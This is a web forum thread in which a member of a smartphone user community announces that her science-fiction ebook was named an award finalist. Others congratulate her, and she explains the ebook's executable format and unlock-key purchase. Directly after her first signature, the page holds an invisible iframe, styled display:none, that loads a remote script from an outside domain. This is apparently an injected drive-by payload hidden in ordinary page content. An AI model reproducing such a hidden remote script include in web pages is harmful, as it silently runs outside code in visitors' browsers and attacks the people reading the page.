+ Reply to Thread
Page 1 of 2 1 2 LastLast

Talking OT: What's a nice word for 'Brag'?

Dear i300-mates:

I was informed this morning that of the two books published by The Writers' Collective and submitted to the 2002 Independent Ebook Awards - BOTH have been named finalists.

And one of those books is mine. :p

I don't which hat is being pushed higher by my swelling head: the Publisher's or the Writer's.

Whadda day.

Lisa<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

Administrator

Arrow

congrats. ill have to stop by the website and check out what you guys have going on over there...

here here! Congrats Lisa.

Originally posted by mjorange
    here here!
    Where? Where? {g} Sorry, couldn't resist. Seriously - thanks, guys!

Lisa

Administrator

Arrow

will you be selling your book? i like to support forum members on their projects.
    also, whats the 'jist' of your book?

Originally posted by Marctronixx
    will you be selling your book? i like to support forum members on their projects. also, whats the 'jist' of your book?
    What a sweetie. <i>The Last Bastion</i> (written under my pen name, Barbara Wellesley) will be for sale in several formats. First, it will up on the site as an ebook in a fabulous new forum - the book <i>is</i> the reader, so no other program is necessary. It looks and reads just like a 'real' book, and I'm sure contributed to its being named a finalist. I pulled it off the site yesterday when I was informed about the Award status because I want to put an electronic "Finalist" sticker on it, but it will be back up in a day or two.

If anyone here would like to buy a Palm version, write to me here and I'll get you a copy. I can't put one on the site since unlike the ebook version, that wouldn't be protected. I know I can trust you guys not to send it around the world.

Second, it will be published as a hardback and paperback in the early fall. Galleys are out for review now, but the few that have already come back are... glowing.

You asked a writer "what's it about?" Heh. Got an hour or so? :p Actually, it's a tough question, since it's such a multi-layered, complex, roller-coaster ride of an SF epic. One reviewer said it could be the next Star Wars (blush, blush), and others have said it reminds them of <i>Dune</i>. In a nutshell, it asks (and tries to answer) the following question:

If evolution didn't stop with Homo Sapiens, what's next? What will it look like, when will it get here and, most importantly -- what will it do to the rest of us when it does.

TLB is the first book in a trilogy; not 'sequels', but rather one huge story, like LOTR. I just thought that readers might not like buying a 1200-page doorstop.

Lisa

I can't wait to read your work! Sounds great. I'm kinda glad you seperated it as I got a bit tired of carrying Les Miserables around everywhere. Had to remember to switch hands else I'd be lopsided.

...and to think that those 1200 pages will have all been typed on your trusty I300/I330!

COOOLLLLLLLLLLLLLLLL Lisa !!!!!!!!!!!!!!!!!!!.... I'll read it, love SF and Dune (all of Frank Herbert's stuff) is among my favs. Good for you.
    .....beam me up Scotty...

Administrator

Arrow

very fascinating lisa.. i would love to read about it...

hmnm.. as an ebook, i might have to do some 'spring cleaning' on the phone to make room for it??!!?

to have your work described as the next 'star wars' (the original, not this new CG crap...) is reason alone to be proud!

my hat goes off to you.

looking forward to reading your work!

Napoleon Bonaparte Jr.

Talking Hello

Congrats Lisa !

Smile Can We BRAG That We Know You?

Great to see someone's hard work rewarded.

Good Luck...Brad

Pretty good...

... considering that you did it all in Grafitti!

8^)
    The older I get, the better I was...

Originally posted by petewat
    COOOLLLLLLLLLLLLLLLL Lisa !!!!!!!!!!!!!!!!!!!.... I'll read it, love SF and Dune (all of Frank Herbert's stuff) is among my favs. Good for you.
    Gee -- don't be shy. Come right out and say how you <i>really</i> feel. :p

And now, for all of you who said you'd like to read this SF epic, The Last Bastion is up and ready for download!

I think you'll find the format almost as much fun as the book itself, but it <i>is</i> an executable -- which means that you don't need any special program to run it -- but it won't work on a Mac. Or, of course, a Palm. As I said before I can't put a Palm .doc on the site, but if any of you would prefer to purchase a copy that way, just write to me privately and I'll create a copy just for you and send it as an attachment.

I'll admit that I'm especially looking forward to some of you reading it. When strangers buy a copy, you may or may not ever hear back from them, but I'm sure you guys will have a lot to say one way or the other.

Just click on the link to Our Books (above) then click the download button. Oh -- and if you want you can also read some reviews of the book and an excerpt. And see a picture of yours truly too.

Enjoy the ride!

Lisa

Originally posted by Marctronixx
    looking forward to reading your work!
    And it's looking forward to being read by you. {g} See my note above....

Lisa

Gee -- don't be shy. Come right out and say how you really feel.
    lol........ yup, "tongue in cheek" has never been my forte. Downloaded the book... cool format and web-page! ... so when is the signing party???

lol........ yup, "tongue in cheek" has never been my forte. Downloaded the book... cool format and web-page! ... so when is the signing party???
    lol -- as soon as you've finished reading it. btw, I was supposed to get an email from regsoft once you'd purchased it (to get the reg key to unlock it) but have not gotten anything from them at all.

Did you not get taken to the correct link? If you were, did the purchase process go smoothly? Did you get your 'unlock' key back by email within minutes? Please reply here either way, because this is my only real chance to communicate with someone buying it and if there's a problem I need to get it fixed NOW.

Thanks for your help!

Lisa

I was supposed to get an email from regsoft
    ... didn't have time to get that far earlier - I just did but I can't verify that I got the key code to download until I get home tonight cuz I gave 'em my home addy.... btw, like that Einstein quote..

... didn't have time to get that far earlier - I just did but I can't verify that I got the key code to download until I get home tonight cuz I gave 'em my home addy.... btw, like that Einstein quote..
    Was just informed by Regsoft that the key was indeed sent. I'm <i>really</i> looking forward to hearing your comments when you've finished it. :p Most people don't understand how isolating it is to write. If you're a performance artist you get instant feedback -- even if it's the audience throwing rotten tomatoes at you! But when you send your book out into the world you almost never get to see/hear the reaction.

And thanks for the mention of the Einstein quote. It took some fairly heavy research to dig up something so... apropos. And unique. It was tough coming up with words that few people have heard from a man so often quoted.

Enjoy the book!

Lisa

Was just informed by Regsoft that the key was indeed sent
    hey Lis......... yup, got the key code & it works just fine (curious process writing it to the registry, I expected a code to manually enter). They've sent it 4 times now...lol...guess they wanted to be sure I got it. Checked out the TWC site too. That looks like a great way for a fledgling writer to get published. Gonna send it to my writer sister who got so frustrated she's now a lawyer too. I'll be sure & let ya know what I think but it looks good so far.
    - Pete

Administrator

Arrow

can wait to get it lisa... ill email you privately and request the paid version when im home. im currently out of town now. ill hit you up friday sometime!